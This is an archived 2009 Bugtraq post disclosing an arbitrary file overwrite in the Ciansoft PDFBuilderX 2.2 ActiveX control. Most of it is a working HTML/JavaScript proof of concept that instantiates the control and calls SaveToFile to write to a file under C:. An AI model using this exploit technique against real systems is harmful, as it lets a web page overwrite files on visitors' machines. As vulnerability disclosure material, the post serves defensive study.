| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 13 Jan 2009 12:41:43 +0100
From: fakeperson7 <fakeperson7@...n.pl>
To: bugtraq@...urityfocus.com
Subject: PDFBuilderX 2.2 Arbitrary File Overwrite
Alfons Luja
========================================================================================================================
<b>
Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite <br/>
p0c <br/>
Alfons Luja <br/>
Pozdrowienia dla odFiecznych fanÓf <br/>
Tesw Eporue <br/>
-9002- <br/>
l00l <br/>
<b/>
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
/*
Class PDFDoc
GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False
vend0r : www.ciansoft.com
*/
try{
var obj = document.getElementById('kupa');
obj.AddPage(1);
obj.SaveToFile("C:/system_.ini");
window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){ window.alert('Poc failed'); }
</script>
========================================================================================================================
Powered by blists - more mailing lists